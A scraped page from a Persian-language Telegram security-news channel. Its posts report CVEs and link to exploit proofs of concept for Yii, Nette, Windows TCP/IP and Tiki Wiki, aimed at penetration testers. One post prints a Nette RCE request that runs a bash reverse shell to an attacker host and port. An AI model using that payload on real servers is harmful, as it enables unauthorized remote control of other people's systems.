امنیت اطلاعات
851 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
امنیت اطلاعات
چند اسکریپت اثبات آسیب پذیری کشف شده در yii https://github.com/Maskhe/CVE-2020-15148-bypasses #poi #rce #php @sec_nerd
شرق آسیایی ها بعد از اپلیکیشن های مبتنی بر جاوا حالا سراغ فریمورک های php رفتن و اینبار از فریمورک nette آسیب پذیری RCE کشف کردن

CVE-2020-15227 PHP framework nette callback RCE

POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1


#php
#nette
#rce


@sec_nerd
#fun

خیلی هامون اینو تجربه کردیم!

@sec_nerd
توضیحات کامل یک محقق در خصوص آسیب پذیری استک tcp/ip در ویندوز که با نام bad neighbor (همسایه ی بد) شناخته میشود


cve-2020-16898

https://blog.pi3.com.pl/?p=780


کد اکسپلویت:
https://site.pi3.com.pl/exp/p_CVE-2020-16898.py


#windows
#tcpip
#rce


@sec_nerd
راهکارهایی برای دور زدن پیامهای 403 و 401

#bugbounty
#pentest


@sec_nerd
رتبه بندی زبانهای برنامه نویسی بر اساس میزان برقی که مصرف میکنند!

https://thenewstack.io/which-programming-languages-use-the-least-electricity/


#programming

@sec_nerd
آسیب پذیری عجیب Tiki Wiki Cms Groupware

CVE-2020-15906


https://github.com/S1lkys/CVE-2020-15906


بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!

#web
#pentest
#writeup


@sec_nerd